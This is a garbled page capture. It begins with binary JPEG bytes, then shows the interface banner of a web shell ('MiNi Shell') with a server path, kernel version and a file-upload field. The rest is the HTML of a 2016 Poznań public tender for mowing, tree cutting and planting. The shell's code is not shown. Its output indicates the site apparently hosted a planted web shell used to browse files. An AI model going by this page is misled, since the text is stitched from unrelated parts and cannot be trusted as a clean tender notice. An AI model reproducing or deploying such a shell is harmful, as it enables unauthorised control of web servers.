JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160216/33858-N-2016.html

<p class="kh_header"><b>Poznań: Pielęgnacja zieleni na terenie miasta Poznania - zasobu nieruchomości będącego we władaniu Zarządu Komunalnych Zasobów Lokalowych Sp. z o.o., w podziale na III zadania</b><br>
<b>Numer ogłoszenia: 33858 - 2016; data zamieszczenia: 16.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Komunalnych Zasobów Lokalowych Sp. z o.o. , ul. Matejki 57, 60-770 Poznań, woj. wielkopolskie, tel. 61 8964800; 8694801, faks 61 8694809.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zkzl.poznan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pielęgnacja zieleni na terenie miasta Poznania - zasobu nieruchomości będącego we władaniu Zarządu Komunalnych Zasobów Lokalowych Sp. z o.o., w podziale na III zadania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pielęgnacja zieleni na terenie miasta Poznania - zasobu nieruchomości będącego we władaniu Zarządu Komunalnych Zasobów Lokalowych Sp. z o.o., w podziale na III zadania:
ZADANIE I: KOSZENIE TRAWY I PRZYCINANIE ŻYWOPŁOTÓW.
Przedmiotem zamówienia są usługi polegające na pielęgnacji terenów zielonych, tj.:
a) pielęgnacji trawników o łącznej powierzchni 400.000 m2:
b) przycięciu żywopłotów o łącznej długości 25.000 mb:
W zakres usługi wchodzi:
Koszenie trawy:
-trzykrotne koszenie trawy za pomocą profesjonalnego sprzętu, umożliwiającego sprawne i dokładne wykonanie czynności, na terenie płaskim i na skarpach, wykoszenie kosami spalinowymi trawników w miejscach niedostępnych dla kosiarki,
- po skoszeniu trawa musi mieć wysokość nie większą niż 10 cm,
- dodatkowe koszenie wybranych terenów zielonych (do 20.000 m2) na dodatkowe zlecenie Zamawiającego,
- niezwłoczne grabienie i wywiezienie skoszonej trawy w ciągu 24 godzin od skoszenia.
Przycinanie żywopłotów:
- jednokrotne równe obcięcie trzech powierzchni roślin z zachowaniem jednakowych wysokości i szerokości dla ciągu; wysokości muszą gwarantować bezpieczeństwo dla pieszych,
- dodatkowe przycięcie wybranych żywopłotów o długości do 2000mb na dodatkowe zlecenie Zamawiającego,
- wywożenie obciętego materiału roślinnego w ciągu 24 godzin po przycięciu.
Wykonawca zobowiązany jest również do wykonania dokumentacji fotograficznej przed 
 i po wykonaniu prac, dla każdego punktu adresowego osobno. 
Świadczenie usług przez Wykonawcę musi odbywać się w całym czasie trwania umowy zgodnie z obowiązującymi przepisami prawa, m.in. wiedzy technicznej oraz obowiązującymi przepisami, w szczególności wywóz odpadów wytworzonych podczas realizacji usługi wykona Wykonawca zgodnie z: Ustawą z dnia 14 grudnia 2012r. o odpadach (Dz. U. 2013 poz.21 z późn. zm.); Ustawą z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach (Dz.U.2013 poz. 1399) Rozporządzeniem Ministra Środowiska z dnia 09.12.2014 r. w sprawie katalogu odpadów (Dz. U. 2014.1923 z 29.12.2014r.), Uchwałą Rady Miasta z dnia 21 maja 2013 r. w sprawie przyjęcia Regulaminu utrzymania czystości i porządku na terenie Miasta Poznania; uchwałą Zgromadzenia Związku Międzygminnego Gospodarki Odpadami Aglomeracji Poznańskiej  z dnia 12 marca 2013 r. w sprawie przyjęcia regulaminu w zakresie gospodarki odpadami komunalnymi na obszarze gmin wchodzących w skład ZM GOAP; 
ZADANIE II: PRZYCINANIE DRZEW I KRZEWÓW, USUWANIE DRZEW POWALONYCH PRZEZ WIATR ORAZ WYCINANIE DRZEW I KRZEWÓW 
I USUWANIE KARPIN.
Przedmiotem zamówienia są: Usługi polegające na przycinaniu drzew i krzewów oraz usuwaniu drzew powalonych przez wiatr, tj.:
a) przycięcie 250 sztuk drzew,
b) przycięcie 2000 m2 krzewów,
c) usunięcie 60 drzew powalonych przez wiatr.
W zakres usługi wchodzi:
- ocena zasadności przycięcia drzew i krzewów,
- wykonywanie cięć pielęgnacyjnych drzew i krzewów wskazanych przez Zamawiającego 
(w tym cięcia pielęgnacyjne drzew - usuwanie suchych i połamanych gałęzi wraz z jednoczesnym podkrzesaniem - usunięciem gałęzi z pni z nadaniem właściwego kształtu i statyki koronie; cięcia techniczne drzew - usuwanie gałęzi wrastających lub dorastających do napowietrznych linii energetycznych i telekomunikacyjnych, będących w kolizji z budynkami lub ich infrastrukturą techniczną, prześwietlanie koron drzew i inne prace pielęgnacyjne w drzewostanie oraz przycinanie krzewów), 
- likwidacja pozostałości masy drzewnej po robotach w drzewostanie i krzewach,
- usuwanie drzew powalonych przez wiatr wraz z usunięciem (frezowanie do poziomu gruntu) karpiny powalonego drzewa,
- usuwanie odpadów stałych (przycięte gałęzie itp.).
Wykonawca zobowiązany jest również do wykonania dokumentacji fotograficznej 
przed i po wykonaniu prac, dla każdego punktu adresowego osobno. 
Świadczenie usług przez Wykonawcę musi odbywać się w całym czasie trwania umowy zgodnie z obowiązującymi przepisami prawa, m.in. wiedzą techniczną oraz obowiązującymi przepisami, w szczególności wywóz odpadów wytworzonych podczas realizacji usługi wykona Wykonawca zgodnie z: 
1. Ustawą z dnia 14 grudnia 2012r. o odpadach (Dz. U. 2013 poz.21 z późn. zm.);
2. Ustawą z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach 
(Dz.U.2013 poz. 1399)
3. Rozporządzeniem Ministra Środowiska z dnia 09.12.2014 r. w sprawie katalogu odpadów (Dz. U. 2014.1923 z 29.12.2014r.),
4.	Uchwałą Rady Miasta z dnia 21 maja 2013 r. w sprawie przyjęcia Regulaminu utrzymania czystości i porządku na terenie Miasta Poznania; uchwałą Zgromadzenia Związku Międzygminnego Gospodarki Odpadami Aglomeracji Poznańskiej z dnia 12 marca 2013 r. w sprawie przyjęcia regulaminu w zakresie gospodarki odpadami komunalnymi na obszarze gmin wchodzących w skład ZM GOAP; 
Ponadto Zamawiający wymaga, by całość drewna pozyskanego podczas prac (grubizny) 
o pierścienicy od 7 do 80 cm (bez karpin, z maksymalną ilością murszu do 20 proc., pocięte 
na odcinki 1-1,5m) została przewieziona na teren bazy Zakładu Lasów Poznańskich 
przy ul. Margonińskiej w Poznaniu.
Wszystkie prace w drzewostanie należy prowadzić zgodnie z art. 83 - 87 ustawy z dnia
16 kwietnia 2004 r. o ochronie przyrody (Dz. U. z 2013 poz.627 ze zm.). Prace związane z pielęgnacją drzew starszych - cięcia, powinny być wykonywane pod nadzorem uprawnionego Inspektora Nadzoru Terenów Zieleni.
Usługi polegające na wycinaniu drzew i krzewów, na które Zamawiający otrzymał decyzję administracyjną zezwalającą na usunięcie, drzew i krzewów, na których usunięcie 
nie jest wymagane zezwolenie, zgodnie z ustawą o ochronie przyrody, z pozostawieniem karpiny na poziomie gruntu, usuwanie karpin drzew, w tym za pomocą środka chemicznego, tj.:
a) wycięcie drzew mniejszych niż 50 cm obwodu - 150 sztuk,
b) wycięcie drzew 51-100 cm obwodu - 40 sztuk,
c) wycięcie drzew 101-200 cm obwodu - 30 sztuk,
d) wycięcie drzew większych niż 200 cm obwodu - 25 sztuk,
e) mechaniczne usunięcie karpiny drzewa - 10 sztuk,
f) usunięcie 1m2 korzenia drzewa za pomocą środka chemicznego - 10m2,
g) wycięcie 1m2 krzewu bez karczowania korzeni - 1000 m2,
h) wycięcie 1m2 krzewu z karczowaniem korzeni - 30 m2,
i) usunięcie 1 m2 korzenia krzewu za pomocą środka chemicznego - 10m2.
W zakres usługi wchodzi:
- pozostawienie karpin po wyciętych drzewach i krzewach na poziomie gruntu,
- karczowanie korzeni wyciętych drzew i krzewów wraz z ich wywozem i dowiezieniem ziemi urodzajnej,
- usuwanie odrostów korzeniowych i korzeni za pomocą środka chemicznego, 
- usuwanie odpadów stałych (wycięte drzewa, krzewy, gałęzie itp.) wraz z ich zrębkowaniem,
- uprzątnięcie terenu po przeprowadzonych pracach,
- po 10 miesiącach od wycięcia danego drzewa przegląd karpiny i w razie konieczności usunięcie odrostów,
- oznaczenie drzew i krzewów do wycięcia na mapkach dostarczonych przez Zamawiającego z podaniem: gatunku, obwodu drzewa lub powierzchni krzewów oraz uzasadnieniem przyczyny wycięcia. Mapki z zaznaczoną lokalizacją drzew i krzewów zostaną zwrócone Zamawiającemu przez Wykonawcę w terminie (zgodnie ze złożoną ofertą) dni od dnia ich przekazania.
Wykonawca zobowiązany jest również do wykonania dokumentacji fotograficznej przed i po wykonaniu prac, dla każdego punktu adresowego osobno.
Świadczenie usług przez Wykonawcę musi odbywać się w całym czasie trwania umowy zgodnie z obowiązującymi przepisami prawa, m.in. wiedzą techniczną 
oraz obowiązującymi przepisami, w szczególności wywóz odpadów wytworzonych podczas realizacji usługi wykona Wykonawca zgodnie z: Ustawą z dnia 14 grudnia 2012r. o odpadach (Dz. U. 2013 poz.21 z późn. zm.); Ustawą z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach (Dz.U.2013 poz. 1399), Rozporządzeniem Ministra Środowiska z dnia 09.12.2014 r. w sprawie katalogu odpadów (Dz. U. 2014.1923 z 29.12.2014r.), Uchwałą Rady Miasta  z dnia 21 maja 2013 r. w sprawie przyjęcia Regulaminu utrzymania czystości i porządku na terenie Miasta Poznania; uchwałą Zgromadzenia Związku Międzygminnego Gospodarki Odpadami Aglomeracji Poznańskiej z dnia 12 marca 2013 r. w sprawie przyjęcia regulaminu w zakresie gospodarki odpadami komunalnymi na obszarze gmin wchodzących w skład ZM GOAP; 
Wszystkie prace w drzewostanie należy prowadzić zgodnie z art. 83 - 87 ustawy z dnia 
16 kwietnia 2004 r. o ochronie przyrody (Dz. U. z 2013 poz.627 ze zm.).
Ponadto Zamawiający wymaga, by całość drewna pozyskanego podczas prac (grubizny) 
o pierścienicy od 7 do 80 cm (bez karpin, z maksymalną ilością murszu do 20%, pocięte 
na odcinki 1-1,5m) została przewieziona na teren bazy Zakładu Lasów Poznańskich 
przy ul. Margonińskiej w Poznaniu.

ZADANIE III: NASADZENIA DRZEW I KRZEWÓW.
Przedmiotem zamówienia są usługi polegające na nasadzeniach drzew i krzewów na terenach wskazanych przez Zamawiającego, tj.:
a) nasadzenie 130 sztuk drzew,
b) nasadzenia 100 sztuk krzewów liściastych,
c) nasadzenia 100 sztuk krzewów iglastych,
d) roczna pielęgnacja nasadzonych drzew - 130 sztuk.
W zakres usługi wchodzi:
- dokonywanie nasadzeń drzew oraz krzewów zgodnie z decyzjami administracyjnymi i wymogami w nich zawartymi dotyczącymi gatunków, obwodów oraz wysokości drzew i krzewów  do nasadzenia oraz innych nasadzeń wskazanych przez Zamawiającego: 
- nasadzenie drzew wraz z bryłą,
- zabezpieczenie każdego drzewa 3 palikami i 3 wiązadłami,
- całkowita zaprawa dołów ziemią urodzajną,
- zastosowanie hydrożeli,
- uformowanie mis,
- wyściółkowanie mis korą przekompostowaną lub mulczem lub kamieniami, 
- podlanie po posadzeniu,
- nawożenie nawozami długodziałającymi,
- opryski na szkodniki,
- roczna pielęgnacja drzew, 
- w przypadku gdy młode drzewa nie wznowią wegetacji po zimie lub obumrą w trakcie sezonu wegetacyjnego - natychmiastowa wymiana na nowe.
Zgodnie z wymogami do nasadzeń należy stosować duże, rozrośnięte egzemplarze:
- w przypadku gatunków liściastych, osiągających duże rozmiary (np. klon pospolity, lipa, platan) o obwodzie pnia minimum 16-18 cm,
- w przypadku gatunków liściastych, osiągających średnie rozmiary (np. klon polny, jarzęby, wiśnie ozdobne) o wysokości minimum 2,5m,
- w przypadku gatunków iglastych szybkorosnących (np. świerk serbski) o wysokości minimum 1,8m,
- w przypadku gatunków iglastych wolnorosnących (np. sosna czarna) o wyskości minimum 1,5m.
Do zadań Wykonawcy należy każdorazowe dostosowanie gatunku drzew i krzewów 
oraz dokładnej lokalizacji nasadzeń na nieruchomości, uwzględniając zasady sztuki ogrodniczej, przebieg instalacji podziemnych (mapki dostarcza Zamawiający), odległość 
od budynku i inne uwarunkowania terenu.
Wykonawca zobowiązany jest do wykonania dokumentacji fotograficznej przed i po wykonaniu prac, dla każdego punktu adresowego osobno.Do zadań Wykonawcy należy również, w szczególności:
1) wykonywanie prac zgodnie z obowiązującymi przepisami, normami, zasadami sztuki ogrodniczej,
2) zakup materiałów niezbędnych do wykonania zamówienia (np. nawóz, środki służące zabezpieczeniu drzew itp.)
3) zabezpieczenie terenu wykonywanych prac przed zniszczeniem,
4) stosowaniu materiałów posiadających wymagane świadectwa,
5) dostarczania na własny koszt wody niezbędnej do prawidłowego wykonania zamówienia (przede wszystkim podlewania)..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający  przewiduje udzielenie zamówień uzupełniających do 10% wartości zamówiena podstawowego dla każdej części zamówienia, zgodnie z art. 67 ust.1 pkt.6 PZP.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.21.14.00-6, 77.21.15.00-7, 77.31.00.00-6, 77.31.41.00-5, 77.34.20.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest do wniesienia - przed upływem terminu składania ofert - wadium w podanej poniżej kwocie: 
Zadanie I - 6.000,00 zł (słownie: sześć tysięcy złotych 00/100). 
Zadanie II - 3.000,00 zł (słownie: trzy tysiące złotych 00/100).
Zadanie III - 2.000,00 zł (słownie: dwa tysiące złotych 00/100).
W przypadku składania ofert na więcej niż jedno zadanie kwotę wadium sumuje się.
Wadium może być wniesione w formach określonych w art. 45 ust. 6 PZP. 
Wadium wnoszone w formie pieniądza należy wpłacić na rachunek bankowy Zamawiającego ING Bank Śląski  o numerze  07 1050 1520 1000 0023 4950 8511.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi uzyskać wpis do Rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości, zwanym dalej rejestrem, prowadzonym przez wójta, burmistrza lub prezydenta miasta właściwego ze względu na miejsce odbierania odpadów komunalnych od właścicieli nieruchomości, a także zezwolenie na transport odpadów - dla zadania I i II.
Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia nie spełnia, w oparciu o informacje zawarte w dokumentach załączonych do oferty</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że w okresie ostatnich trzech lat przed wszczęciem postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - świadczył co najmniej 1 usługę odpowiadającą swoim rodzajem usługom stanowiącym przedmiot zamówienia, na wartość brutto nie mniejszą niż:
Zadanie I - 200.000 zł
Zadanie II - 120.000 zł
Zadanie III - 50.000 zł
oraz posiada dokumenty potwierdzające, że usługi 
te zostały wykonane lub są wykonaywane należycie.
W przypadku złożenia oferty na więcej niż jedno zadanie, Zamawiający wymaga wykazania się taką ilością usług, na jaką liczbę zadań Wykonawca składa ofertę, o wartości wskazanej powyżej dla każdej usługi.
Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia nie spełnia, w oparciu o informacje zawarte w dokumentach załączonych do oferty</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi w czasie trwania umowy dysponować sprzętem umożliwiającym wykonywanie przedmiotu zamówienia, tj.:
ZADANIE I:
- kosiarka samojezdna - 2 szt.
- kosa spalinowa - 2 szt.
- wykaszarka żyłkowa - 1 szt.
- kosiarka ciągnikowa - 1 szt.
- piła spalinowa - 1 szt.
- nożyce spalinowe do żywopłotu - 3 szt.
- ciągnik z przyczepą - 1 szt.
ZADANIE II:
- piła spalinowa - 3 szt.
- rozdrabniacz do gałęzi - 2 szt.
- podnośnik - 2 szt.
- ciągnik z przyczepą - 2 szt.
- sprzęt alpinistyczny - 2 szt.
- frezarka spalinowa do pni - 1 szt.
W przypadku złożenia oferty na więcej niż jedno zadanie Zamawiający wymaga aby Wykonawca dysponował sumą sprzętów określonych 
dla poszczególnych zadań. 
Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia nie spełnia, w oparciu o informacje zawarte w dokumentach załączonych do oferty</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi w czasie trwania umowy dysponować co najmniej jedną osobą posiadającą uprawnienia Inspektora Nadzoru Terenów Zieleni - dla zadania II 
i III.
Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia nie spełnia, w oparciu o informacje zawarte w dokumentach załączonych do oferty</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
